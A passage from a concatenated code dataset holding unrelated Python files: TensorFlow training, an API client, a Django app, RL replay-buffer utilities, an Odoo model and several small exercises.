\n\nnew_y = tf.nn.softmax(y,name='new_y')\n\ncross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y,labels=y_) \ncross_entropy_mean = tf.reduce_mean(cross_entropy) \n#tf.get_collection:从一个结合中取出全部变量,是一个列表\nloss = cross_entropy_mean + tf.add_n(tf.get_collection('losses'))\n\n#learn_rate = tf.placeholder(\"float\")\n\ntrain_op = tf.train.AdamOptimizer(0.001).minimize(loss)\ncorrect_prediction = tf.equal(tf.cast(tf.argmax(y,1),tf.int32),y_)\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\n\n\nwith tf.Session() as sess:\n saver = tf.train.Saver()\n sess.run(tf.global_variables_initializer())\n batch_size = 10\n train_num = 150\n rate = 0.001\n Tra_acc = np.zeros(train_num)\n Tes_acc = np.zeros(train_num)\n for i in range(train_num):\n train_loss,train_acc,batch_num = 0, 0, 0\n for train_data_batch,train_label_batch in get_batch(train_data,train_label,batch_size):\n _,tra_err,tra_acc = sess.run([train_op,loss,accuracy],feed_dict={\n x:train_data_batch,\n y_:train_label_batch,\n keep_prob:0.5})\n train_loss+=tra_err\n train_acc+=tra_acc\n batch_num+=1\n Tra_acc[i] = train_acc/batch_num\n if (Tra_acc[i]<0.75) & (Tra_acc[i]>0.5):\n rate = 0.001\n elif Tra_acc[i]>0.75:\n rate = 0.001\n print('第',str(i),'次 train acc:',Tra_acc[i])\n \n test_acc,batch_num_t = 0, 0\n for test_data_batch,test_label_batch in get_batch(test_data,test_label,batch_size):\n tes_acc = sess.run(accuracy,feed_dict={\n x:test_data_batch,\n y_:test_label_batch,\n keep_prob:1.0})\n test_acc+=tes_acc\n batch_num_t+=1\n Tes_acc[i] = test_acc/batch_num_t\n print('第',str(i),'次 test acc:',Tes_acc[i])\n plt.plot(Tra_acc),plt.plot(Tes_acc)\n saver.save(sess,\"./trained.ckpt\")","sub_path":"tf_base_5.py","file_name":"tf_base_5.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"16413891","text":"import os\nimport json\nimport errno\nimport zipfile\nimport requests\nimport StringIO\n\n\nclass APIBase(object):\n\tdef __init__(self, home, api_url, token, config, debug, **kwargs):\n\t\tself.home = os.path.realpath(os.path.expanduser(home))\n\t\tself.api_url = api_url\n\t\tself.config = os.path.realpath(os.path.expanduser(config))\n\t\tself.debug = debug\n\n\t\tself.try_read_config(token)\n\n\tdef _build_url(self, url):\n\t\treturn requests.compat.urljoin(self.api_url, url)\n\n\tdef _headers(self):\n\t\treturn {\n\t\t\t'Authorization': 'token %s' % (self.token)\n\t\t}\n\n\tdef _call(self, url, method, **kwargs):\n\t\tkwargs['headers'] = self._headers()\n\n\t\tmethod = getattr(requests, method)\n\n\t\tresponse = method(self._build_url(url), **kwargs)\n\t\tresponse.raise_for_status()\n\t\treturn response\n\n\tdef _get(self, url, data={}):\n\t\treturn self._call(url, 'get', params=data)\n\n\tdef _post(self, url, data={}):\n\t\treturn self._call(url, 'post', data=data)\n\n\nclass LangAPIMixin():\n\tdef lang_list(self):\n\t\treturn self._get(self._build_url('/api/v1/lang/')).json()\n\n\nclass TaskAPIMixin():\n\tdef task_list(self, lang):\n\t\treturn self._get(self._build_url('/api/v1/task/'), {'lang': lang}).json()\n\n\tdef has_task(self, lang, task):\n\t\ttry:\n\t\t\tself._get(self._build_url('/api/v1/task/%s-%s' % (lang, task, )))\n\t\texcept requests.exceptions.HTTPError as e:\n\t\t\tif e.response.status_code == 404:\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\traise\n\t\telse:\n\t\t\treturn True\n\n\tdef task_get(self, lang, task):\n\t\ttask = self._get(self._build_url('/api/v1/task/%s-%s/' % (lang, task, ))).json()\n\n\t\tzip = zipfile.ZipFile(\n\t\t\tStringIO.StringIO(\n\t\t\t\trequests.get(task.get('content'), stream=True).content\n\t\t\t)\n\t\t)\n\n\t\tpath = os.path.join(os.path.expanduser(self.home), lang, task.get('name'))\n\n\t\ttry:\n\t\t\tos.makedirs(path)\n\t\texcept OSError as exc:\n\t\t\tif exc.errno == errno.EEXIST and os.path.isdir(path):\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\traise\n\n\t\tzip.extractall(path)\n\n\nclass AuthMixin():\n\tdef login(self, github_token):\n\t\treturn self._post(self._build_url('api-token-auth/'), {\n\t\t\t'github_token': github_token\n\t\t}).json()\n\n\nclass StatsMixin():\n\tdef stats(self):\n\t\treturn self._get(self._build_url('/stats/')).json()\n\n\nclass SolutionMixin():\n\tdef persist_token(self, token):\n\t\twith open(self.config, 'w') as f:\n\t\t\tf.write(json.dumps(dict(token=token)))\n\n\tdef try_read_config(self, default=None):\n\t\tif os.path.isfile(self.config):\n\t\t\twith open(self.config, 'r') as f:\n\t\t\t\tself.token = json.loads(f.read()).get('token')\n\t\telse:\n\t\t\tself.token = default\n\n\tdef solution_get(self, hash_id):\n\t\treturn self._get(self._build_url('/api/v1/solution/%s/' % (hash_id, ))).json()\n\n\tdef solution_list(self, lang, task):\n\t\treturn self._get(self._build_url('/api/v1/solution/'), {'lang': lang, 'task': task}).json()\n\n\tdef submit(self, lang, task, files):\n\t\tin_memory = StringIO.StringIO()\n\t\tzip = zipfile.ZipFile(in_memory, \"a\")\n\n\t\tfor file in files:\n\t\t\tzip.write(file.path, file.rel)\n\n\t\t\tfor f in zip.filelist:\n\t\t\t\tf.create_system = 0\n\n\t\tzip.close()\n\t\tin_memory.seek(0)\n\n\t\ttry:\n\t\t\tresponse = requests.post(self._build_url('/api/v1/submit/'), files={\n\t\t\t\t'content': in_memory.read()\n\t\t\t}, data={\n\t\t\t\t'lang': lang,\n\t\t\t\t'task': task,\n\t\t\t}, headers=self._headers())\n\n\t\t\tresponse.raise_for_status()\n\n\t\t\treturn response.json()\n\t\texcept requests.exceptions.HTTPError as e:\n\t\t\tif e.response.status_code == 401:\n\t\t\t\tfrom oplevelse import oplevelse\n\t\t\t\traise oplevelse.NotAuthorized()\n\t\t\telse:\n\t\t\t\traise\n\n\nclass OplevelseAPI(APIBase, LangAPIMixin, TaskAPIMixin, SolutionMixin, AuthMixin, StatsMixin):\n\tpass\n","sub_path":"cli/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"33094518","text":"import numpy as np\nimport pandas as pd\nimport argparse\n\n\ndef check_smiles_match(data,screen):\n return (data['SMILES'].values==screen['SMILES'].values).all()\n\ndef apply_screen(data,col_name,selection_type,selection_thresh,keep):\n data = data.sort_values(col_name,ascending=True)\n if selection_type=='Fraction':\n if keep=='High':\n data = data[-int(len(data)*selection_thresh):]\n elif keep=='Low':\n data = data[0:-int(len(data)*selection_thresh)]\n else:\n print('WARNING: INVALID KEEP TYPE')\n elif selection_type=='Cutoff':\n if keep=='High':\n data = data[data[col_name]>selection_thresh]\n elif keep=='Low':\n data = data[data[col_name]\n# Last Change: October 9, 2016\n# URL: https://capturer.readthedocs.org\n\n# Standard library modules.\nimport codecs\nimport os\nimport re\n\n# De-facto standard solution for Python packaging.\nfrom setuptools import setup, find_packages\n\n# Find the directory where the source distribution was unpacked.\nsource_directory = os.path.dirname(os.path.abspath(__file__))\n\n# Find the current version.\nmodule = os.path.join(source_directory, 'capturer', '__init__.py')\nfor line in open(module, 'r'):\n match = re.match(r'^__version__\\s*=\\s*[\"\\']([^\"\\']+)[\"\\']$', line)\n if match:\n version_string = match.group(1)\n break\nelse:\n raise Exception(\"Failed to extract version from %s!\" % module)\n\n# Fill in the long description (for the benefit of PyPI)\n# with the contents of README.rst (rendered by GitHub).\nreadme_file = os.path.join(source_directory, 'README.rst')\nwith codecs.open(readme_file, 'r', 'utf-8') as handle:\n readme_text = handle.read()\n\nsetup(\n name='capturer',\n version=version_string,\n description=\"Easily capture stdout/stderr of the current process and subprocesses\",\n long_description=readme_text,\n url='https://capturer.readthedocs.org',\n author='Peter Odding',\n author_email='peter@peterodding.com',\n packages=find_packages(),\n test_suite='capturer.tests',\n install_requires=[\n 'humanfriendly >= 2.1',\n ],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Topic :: Communications',\n 'Topic :: Scientific/Engineering :: Human Machine Interfaces',\n 'Topic :: Software Development',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: User Interfaces',\n 'Topic :: System :: Shells',\n 'Topic :: System :: System Shells',\n 'Topic :: System :: Systems Administration',\n 'Topic :: Terminals',\n 'Topic :: Text Processing :: General',\n ])\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"15839503","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 18 14:36:18 2018\n\n@author: ben\n\"\"\"\n\nfrom astropy.io import fits\nfrom scipy.optimize import nnls \n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.style.available\nmpl.style.use('seaborn-white') \n\nimport numpy as np\nimport scipy as sci\n\nA = fits.getdata('Q_tomo.fits')\n\nprint(np.linalg.cond(A))\nmu = 1.0/np.linalg.norm(A)**2\nprint(mu)\n\n#plt.figure()\n#plt.imshow(A,cmap='magma',interpolation='nearest')\n\nx_true = np.zeros(50)\nx_true[21] = 1.\nb = np.dot(A,x_true)\n\n#b += np.random.standard_normal(b.shape) * 1e-6\n\nplt.figure('True solution')\nplt.plot(x_true)\n\n\nplt.figure('Given right hand side')\nplt.plot(b)\n\n\n\n#===================================\n# Type of regularization\n#===================================\nreg = 'l0' # or 'l0'\n\n#===================================\n# Set tuning parameters\n#===================================\n_, s, _ = sci.linalg.svd(A, False)\nkappa = s[0] ** 2 * 0.001\nnu = 1 / kappa * 0.1\nlamb = 1e-11 / 3 # controll level of sparsity \nbeta = 1e-12 # add some ridge\n\n\nmaxiter = 20000 # max iterations\n\n#===================================\n# Init Algorithm\n#===================================\nC = np.eye(len(x_true))\nH = A.T.dot(A) + kappa * C.T.dot(C)\nHinv = sci.linalg.pinv2(H)\n\nFupper = kappa * A.dot(Hinv).dot(C.T)\nFlower = np.sqrt(kappa) * (np.eye(C.shape[0]) - kappa * C.dot(Hinv).dot(C.T))\nF = np.concatenate((Fupper, Flower))\n\nGupper = np.eye(A.shape[0]) - A.dot(Hinv).dot(A.T)\nGlower = np.sqrt(kappa) * C.dot(Hinv).dot(A.T)\nG = np.concatenate((Gupper, Glower))\n\ng = G.dot(b)\n\n#===================================\n# Project\n#===================================\nQ , _, _ = sci.linalg.svd(F, False)\n\nQ = Q[:,0:5]\n\nF = Q.T.dot(F)\ng = Q.T.dot(g)\n\nw = np.zeros(x_true.shape)\nfor i in range(maxiter):\n\n grad = F.T.dot(F.dot(w) - g) - beta * w\n w_temp = w - nu * grad\n\n if reg == 'l1':\n # l1 soft-threshold\n idxH = w_temp > lamb * nu\n idxL = w_temp <= -lamb * nu\n w = np.zeros_like(w_temp)\n w[idxH] = w_temp[idxH] - lamb * nu\n w[idxL] = w_temp[idxL] + lamb * nu\n\n if reg == 'l0':\n\n # l0 soft-threshold\n idxH = w_temp**2 > (lamb * nu) ** 2\n w = np.zeros_like(w_temp)\n w[idxH] = w_temp[idxH] \n w = np.maximum(w, 0.0)\n \n \nplt.figure('Estimate for w')\nplt.plot(w)\n \nxapprox = Hinv.dot(A.T.dot(b) + kappa * C.T.dot(w))\n \nplt.figure('Estimate for x')\nplt.plot(xapprox)\n","sub_path":"relaxed_lasso_projected.py","file_name":"relaxed_lasso_projected.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"194195064","text":"temp = int(raw_input(\"What is the tempature? \"))\nhumidity = raw_input(\"is humidity high or low \")\ntornado_warning = raw_input(\"Do you see a tornado? \")\n# elsif example\n\n# I want a special message for extreme conditions\nif (temp >= 100) and (humidity == \"high\"):\n\tprint(\"Heat advisory due to humidity and high tempature. Use extra caution\")\n# Want to print this if it is humid. I don't want to print the first if and this statement because that would be repetitive. \nelif (temp > 80) and (humidity == \"high\"):\n\tprint(\"Heat advisory due to humidity\")\n# Want to print this if it is hot but not if it is hot and humid. If it is hot and humid we already gave the \"extra caution\" message.\nelif temp > 100:\n\tprint(\"Heat advisory due to tempture\")\n# we checked all the conditions for a heat advisory and none of them applied\nelse:\n\tprint(\"No heat advisory\")\n\n# If these were all if statements, then on the very hot humid days we would too many repetitive messages.\n# Another benefit is that our else statments keeps track of three different ways there could be a heat advisory. \n\n# this additional contition will always be evaluated, regardless of the previous statement \nif tornado_warning == 'yes':\n\tprint(\"Stop worring about the heat and take cover!\")\n","sub_path":"lesson-3/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"31869955","text":"# Source : https://leetcode.com/problems/search-in-rotated-sorted-array/\n# Author : Phat Nguyen\n# Date : 2015-03-25\n\n\"\"\"\nPROBLEM:\nSuppose a sorted array is rotated at some pivot unknown to you beforehand.\n\n(i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).\n\nYou are given a target value to search. If found in the array return its index, otherwise return -1.\n\nYou may assume no duplicate exists in the array.\n\nSOLUTION:\n\n\"\"\"\n\nclass Solution:\n # @param A, a list of integers\n # @param target, an integer to be searched\n # @return an integer\n def search(self, A, target):\n i = self.mainIndex(A, 0, len(A)-1)\n if i == -1:\n plus = 0\n else:\n plus = i\n return self.binSearch(A, 0, len(A)-1, target, plus)\n \n def mainIndex(self, A, left, right):\n if left == right:\n return -1\n if left == right - 1:\n if A[left] > A[right]:\n return right\n else:\n return -1\n \n mid = (left + right) / 2\n if A[left] < A[mid]:\n return self.mainIndex(A, mid, right)\n else:\n return self.mainIndex(A, left, mid)\n \n def binSearch(self, A, left, right, target, plus):\n if left > right:\n return -1\n else:\n mid = (left + right) / 2\n if A[(mid+plus)%len(A)] > target:\n return self.binSearch(A, left, mid - 1, target, plus)\n elif A[(mid+plus)%len(A)] < target:\n return self.binSearch(A, mid + 1, right, target, plus)\n else:\n return (mid+plus)%len(A)\n","sub_path":"py/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"278998753","text":"from collections import deque\nimport numpy as np\nimport os\nfrom random import sample\nfrom utilfunctions import one_hot\nfrom utilfunctions import scale_state\nfrom utilfunctions import initializer\nfrom utilfunctions import single_shape_adaptor\nfrom utilfunctions import update_state_step\n\n\nclass event:\n '''\n the class event offers a container for \n s, a, r, s_prime tuple to gether with done\n \n one should note that the s, and s' are saved in scaled form\n (which is expected as the input for the networks)\n '''\n def __init__(self, state, action_id, reward, state_prime, done, env):\n # converting the state, state_prime to scaled ones\n scaled_state = scale_state(state, env)\n scaled_state_prime = scale_state(state_prime, env)\n # one_hot the action\n action = one_hot(action_id, nr_actions=env.action_space.n)\n\n self.scaled_state = scaled_state\n self.action = action\n self.reward = reward\n self.scaled_state_prime = scaled_state_prime\n self.done = done\n\n\nclass Histories:\n '''\n a class for creation and manipulation of the buffer\n '''\n def __init__(self, max_size=10_000): #, size=1000\n self.size = 0 #size\n self.events = deque([])\n self.max_size = max_size\n\n def reset_the_buffer(self):\n '''\n reset the buffer\n '''\n self.events = ([])\n self.size = 0\n \n def consider_this_event(self, event):\n if (self.size < self.max_size):\n self.fill_by_appending(event)\n else:\n self.roll_and_replace(event)\n \n def fill_by_appending(self, event):\n '''\n filling a new buffer or a resetted one by appending to it\n '''\n self.events.append(event)\n #import pdb; pdb.set_trace()\n if (len(self.events) > self.size):\n self.size += 1\n\n def roll_and_replace(self, event):\n '''\n rolls the buffer, pushing the oldest experience out and adding a new one at the end of the list\n '''\n self.events.rotate(-1)\n self.events[0] = event\n\n def return_a_batch(self, batchsize=32):\n '''\n returns a random batch from the bucket, note that it first shuffles the bucket\n and then picks the sampels.\n '''\n return sample(self.events, k=batchsize)\n\n\ndef logging_performance(log, training_id, steps, write_to_disk=True):\n '''\n returns a log (a numpy array) which has some analysis of the each round of training.\n\n Key arguments:\n\n training_id -- the id of the iteration which is just finished.\n steps -- the total number of steps before failing\n write_to_disk -- a flag for writting the performance to the disk\n\n Output:\n\n a numpy array with info about the iterations and the learning\n '''\n\n if training_id == 0:\n log = np.array([[training_id, steps]])\n else:\n log = np.append(log, np.array([[training_id, steps]]), axis=0)\n\n if write_to_disk:\n perfdir = './performance-and-animations/'\n if not os.path.exists(perfdir):\n os.makedirs(perfdir)\n\n np.savetxt(perfdir+'steps_vs_iteration.dat', log)\n\n return log\n\n\ndef initial_filling_of_buffer(rounds_data_exploration, agent, main_buffer, env, epsilon):\n '''\n fills the main_buffer with events, i.e. (s, a, r, s', done)\n which are happened during some rounds of experiments\n for the agent. The actions that the agent took are based on the Q-target network with epsilon greedy approach\n \n Keyword arguments:\n\n rounds_data_exploration -- number of experiment rounds done \n agent -- the agent\n main_buffer -- the replay buffer\n env -- environement\n epsilon -- the epsilon for the epsilon greedy approach\n\n returns:\n\n the replay buffer\n '''\n \n nr_features = env.observation_space.high.shape[0]\n \n for training_id in range(rounds_data_exploration):\n\n print(\"\\nround: \"+str(training_id))\n\n initial_state = env.reset()\n\n state, terminated, steps = initializer(initial_state)\n state = single_shape_adaptor(state, nr_features)\n \n while not terminated:\n\n action_id = agent.action_based_on_Q_target(state, env, epsilon)\n\n new_state, reward, terminated, info = env.step(action_id)\n\n new_state = single_shape_adaptor(new_state, nr_features)\n\n this_event = event(state, action_id, reward, new_state, terminated, env)\n\n #main_buffer.fill_by_appending(this_event)\n main_buffer.consider_this_event(this_event)\n \n state, steps = update_state_step(new_state, steps)\n\n print(\"... the terminal_state is reached after \"+str(steps))\n\n return main_buffer\n\n\ndef testing_performance(agent, nr_steps_test, env):\n ''' runs a number of episodes and returns the average performance'''\n \n sum_step_performance = 0\n\n nr_features = env.observation_space.high.shape[0]\n\n print(\"... the test is started\")\n\n for test_id in range(nr_steps_test):\n initial_state_t = env.reset()\n state_t, terminated_t, steps_t = initializer(initial_state_t)\n state_t = single_shape_adaptor(state_t, nr_features)\n\n while not terminated_t:\n action_id_t = agent.action_based_on_Q_target(state_t, env, epsilon=0.0)\n new_state_t, reward_t, terminated_t, info_t = env.step(action_id_t)\n new_state_t = single_shape_adaptor(new_state_t, nr_features)\n state_t, steps_t = update_state_step(new_state_t, steps_t)\n if test_id == 0:\n env.render()\n\n sum_step_performance += steps_t\n print(\"... test #\"+str(test_id)+\" with performance \"+str(steps_t))\n \n sum_step_performance /= nr_steps_test\n\n return sum_step_performance\n","sub_path":"rl_utils.py","file_name":"rl_utils.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20895763","text":"#!/usr/bin/env python3\n\nfrom collections import defaultdict\n\n\ndef run(lines):\n def is_nice(word):\n around_letter = False\n # could do with regexes and capture group refs\n # (.).\\1' and (..).+\\1\n # but let's invent something more fun\n # iterate in overlapping triplets\n for _1, _, _3 in zip(word, word[1:], word[2:]):\n if _1 == _3:\n around_letter = True\n i = 0\n pair2index = defaultdict(list)\n pair2count = defaultdict(int)\n # iterate overlapping pairs\n for _1, _2 in zip(word, word[1:]):\n # save each pair and its starting location\n pair2index[_1, _2].append(i)\n # save count for each pair\n pair2count[_1, _2] += 1\n i += 1\n has_pair = False\n # find the first pair that occurs more than once\n # at indices with diff > 1 (no overlap)\n for pair, count in pair2count.items():\n if count > 1:\n indices = pair2index[pair]\n for i1, i2 in zip(indices, indices[1:]):\n if i2 - i1 > 1:\n has_pair = True\n break\n else:\n continue\n break\n return around_letter and has_pair\n nice_count = 0\n for line in lines:\n if is_nice(line):\n nice_count += 1\n return nice_count\n\n\nwith open('input.txt') as lines:\n print(run((line.strip() for line in lines)))\n","sub_path":"05/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408168190","text":"from odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\n\n\nclass VmMarksheetLine(models.Model):\n _name = \"vm.marksheet.line\"\n _rec_name = \"student_id\"\n _description = \"Marksheet Line\"\n\n marksheet_reg_id = fields.Many2one(\n 'vm.marksheet.register', 'Marksheet Register')\n evaluation_type = fields.Selection(related='marksheet_reg_id.exam_session_id.evaluation_type',\n store=True)\n student_id = fields.Many2one('vm.student', 'Student', required=True)\n result_line = fields.One2many(\n 'vm.result.line', 'marksheet_line_id', 'Results')\n total_marks = fields.Integer(\"Total Marks\",\n compute='_compute_total_marks',\n store=True)\n percentage = fields.Float(\"Percentage\", compute='_compute_percentage',\n store=True)\n generated_date = fields.Date(\n 'Generated Date', required=True,\n default=fields.Date.today(), track_visibility='onchange')\n grade = fields.Char('Grade', readonly=True, compute='_compute_grade')\n status = fields.Selection([\n ('pass', 'Pass'),\n ('fail', 'Fail')\n ], 'Status', compute='_compute_status', store=True)\n active = fields.Boolean(default=True)\n\n @api.constrains('total_marks', 'percentage')\n def _check_marks(self):\n for record in self:\n if (record.total_marks < 0.0) or (record.percentage < 0.0):\n raise ValidationError(_(\"Enter proper marks or percentage!\"))\n\n @api.depends('result_line.marks')\n def _compute_total_marks(self):\n for record in self:\n record.total_marks = sum([\n int(x.marks) for x in record.result_line])\n\n @api.depends('total_marks')\n def _compute_percentage(self):\n for record in self:\n total_exam_marks = sum(\n [int(x.exam_id.total_marks) for x in record.result_line])\n record.percentage = \\\n record.total_marks and \\\n (100 * record.total_marks) / total_exam_marks or 0.0\n\n @api.depends('percentage')\n def _compute_grade(self):\n for record in self:\n if record.evaluation_type == 'grade':\n grades = record.marksheet_reg_id.result_template_id.grade_ids\n for grade in grades:\n if grade.min_per <= record.percentage and \\\n grade.max_per >= record.percentage:\n record.grade = grade.result\n else:\n record.grade = None\n else:\n record.grade = None\n\n @api.depends('result_line.status')\n def _compute_status(self):\n for record in self:\n record.status = 'pass'\n for result in record.result_line:\n if result.status == 'fail':\n record.status = 'fail'\n","sub_path":"viseducat_exam/models/marksheet_line.py","file_name":"marksheet_line.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"410597663","text":"from os.path import abspath, expanduser\r\nimport subprocess\r\n\r\n\"\"\"\r\nUses sentence compression: https://github.com/cnap/sentence-compression\r\nI made the following adjustments:\r\n* build.xml uses multirootfileset to point to cplex and research/compression\r\n* compress takes -t as targets, -r correctly takes argument now\r\n* CompressionModel.java correctly overrides targets over compression ratio\r\n* CompressionModel.java has targets as upper limits\r\n\"\"\"\r\n\r\npath = '~/sentence-compression/compress'\r\nlm = '~/Language Models/lm_giga_64k_vp_3gram/lm_giga_64k_vp_3gram.arpa'\r\ntmp_sents = 'sentences_to_shorten.txt'\r\ntmp_goals = 'goal_lengths.txt'\r\n\r\ndef write_line(file, line):\r\n file.write('{}\\n'.format(line))\r\n\r\ndef exact(p):\r\n return '\"{}\"'.format(p)\r\n\r\ndef compress_sentences(sents, lens):\r\n with open(tmp_sents, 'w') as f:\r\n with open(tmp_goals, 'w') as l:\r\n for i, p in enumerate(zip(sents, lens)):\r\n s, d = p\r\n write_line(f, s)\r\n write_line(l, '{}.{}\\t\\t\\t{}'.format(tmp_sents, i, d - 1))\r\n to_process = [expanduser(path), '-i', tmp_sents, '-l',\r\n exact(expanduser(lm)), '-t', tmp_goals, '-q']\r\n proc = subprocess.run(to_process, stdout=subprocess.PIPE).stdout\r\n for line in proc.decode('utf8').split('\\n'):\r\n if line:\r\n yield line.split('\\t')[2]\r\n","sub_path":"sentence_compression.py","file_name":"sentence_compression.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"262604220","text":"from django.shortcuts import render, HttpResponseRedirect, HttpResponse\nfrom django.http import JsonResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom .models import Profile, Relation\nfrom django.views.decorators.csrf import csrf_exempt, csrf_protect\nfrom django.core.exceptions import ObjectDoesNotExist\nimport os\nfrom django.core.files.storage import default_storage\nfrom django.core.files.base import ContentFile\nfrom django.conf import settings\nfrom .forms import PostForm\n\n# Create your views here.\ndef home(request):\n return render(request, \"index.html\", {'title': \"Rusty\"})\n\n\ndef __register(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect(\"/\")\n if request.method == \"POST\":\n username = request.POST['username']\n email = request.POST['email']\n password = request.POST['password']\n try:\n userfdb = User.objects.get(username=username)\n if userfdb is not None:\n return render(request, \"register.html\", {'title': \"register\", 'error': 'username already exist'})\n except Exception as e:\n user = User.objects.create_user(username=username, email=email, password=password)\n user.save()\n profile = Profile(user=user)\n profile.statu = 0\n profile.save()\n return HttpResponseRedirect(\"login\")\n\n else:\n return render(request, \"register.html\", {'title': \"register\"})\n\n\ndef __login(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect(\"/\")\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n profile = Profile.objects.get(user=user)\n if profile.statu == 0:\n return HttpResponseRedirect('completeprofile')\n else:\n return HttpResponseRedirect(\"/\")\n else:\n return render(request, 'login.html', {'title': \"login page\"})\n elif request.method == \"GET\":\n return render(request, 'login.html', {'title': \"login page\"})\n\n\ndef articles(request):\n return render(request, \"articles.html\", {'title': \"Articles\"})\n\n\ndef __profile(request, username):\n if request.method == \"POST\":\n user = User.objects.get(username=username)\n if user:\n profile = Profile.objects.get(user=user)\n if request.FILES.get('img',None):\n path = default_storage.save(request.user.username+\"_\"+request.FILES['img'].name, ContentFile(request.FILES['img'].read()))\n tmp_file = os.path.join(settings.MEDIA_ROOT, path)\n profile.img = path\n profile.fullname = request.POST['fullname']\n profile.about = request.POST['about']\n profile.email = request.POST['email']\n location = request.POST['location']\n company = request.POST['company']\n profile.location = location\n profile.company = company\n profile.save()\n return HttpResponseRedirect(str(request.user))\n else:\n user = User.objects.get(username=username)\n if user:\n profile = Profile.objects.get(user=user)\n r = Relation.objects.filter(from_user=user)\n r2 = Relation.objects.filter(to_user=user)\n followers = Relation.objects.filter(from_user=request.user, to_user=profile.user).count()\n print(followers)\n st = \"Follow\"\n if followers > 0:\n st = \"Unfollow\"\n\n return render(request, \"profile.html\",\n {'title': 'Profile', 'profile': profile, 'me': r, 'them': r2, 'st': st})\n else:\n return render(request, \"index.html\", {'title': 'Home'})\n\n\ndef __logout(request):\n logout(request)\n return HttpResponseRedirect(\"login\")\n\n\ndef __cp(request):\n if not request.user.is_authenticated:\n return HttpResponseRedirect(\"login\")\n if request.method == \"POST\":\n fullname = request.POST['fullname']\n about = request.POST['about']\n profile = Profile.objects.get(user=request.user)\n profile.fullname = fullname\n profile.about = about\n profile.statu = 1\n profile.save()\n\n return HttpResponseRedirect(\"profile/\" + request.user.username)\n return render(request, \"complete_profile.html\", {'title': 'Complete profile'})\n\n\n@csrf_protect\ndef __relation(request):\n if request.is_ajax and request.method == \"POST\":\n if request.POST['st'] == \"Follow\":\n new_relation = Relation()\n to_user = User.objects.get(username=request.POST['to_user'])\n profile = Profile.objects.get(user = to_user )\n new_relation.profile = profile\n new_relation.from_user = request.user\n new_relation.to_user = to_user\n new_relation.statu = 'y'\n new_relation.save()\n else:\n to_user = User.objects.get(username=request.POST['to_user'])\n relation = Relation.objects.get(from_user=request.user, to_user=to_user)\n relation.delete()\n return JsonResponse({})\n else:\n following = Relation.objects.filter(from_user=request.user)\n followers = Relation.objects.filter(to_user=request.user)\n\n return render(request, \"relations.html\", {'title': 'Relations', 'followers': followers, 'following': following})\n\n\ndef __upload(request):\n if request.is_ajax and request.method == \"Post\":\n img = request.FILES['img']\n return JsonResponse({'img': img})\n else:\n return JsonResponse({})\n\n\ndef __add_post(request):\n if request.method == \"POST\":\n formset = PostForm(request.POST, request.FILES)\n if formset.is_valid():\n formset.save()\n else:\n formset = PostForm()\n return render(request, 'add_post.html', {'formset': formset})\n","sub_path":"rusty/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"643434626","text":"# ===========================================================================\n#\n# file : gf_tools.py\n# part of : godafoss micropython library\n# url : https://www.github.com/wovo/godafoss\n# author : Wouter van Ooijen (wouter@voti.nl) 2023\n# license : MIT license, see license variable in the __init__.py\n#\n# This file is part of the Godafoss perhiperal interface library.\n#\n# ===========================================================================\n#\n# This file contains some basic tooling that is not\n# MicroPytyhon specific and has no external dependencies.\n#\n# ===========================================================================\n\nimport machine\n\n\n# ===========================================================================\n\ndef sign( x ):\n return 1 if x > 0 else -1 if x < 0 else 0\n\n# ===========================================================================\n\ndef less( x, n = 1 ):\n return x - sign( x ) * n\n\n# ===========================================================================\n\ndef unity(\n x: any\n) -> any:\n \"\"\"\n returns its argument unmodified\n\n :param 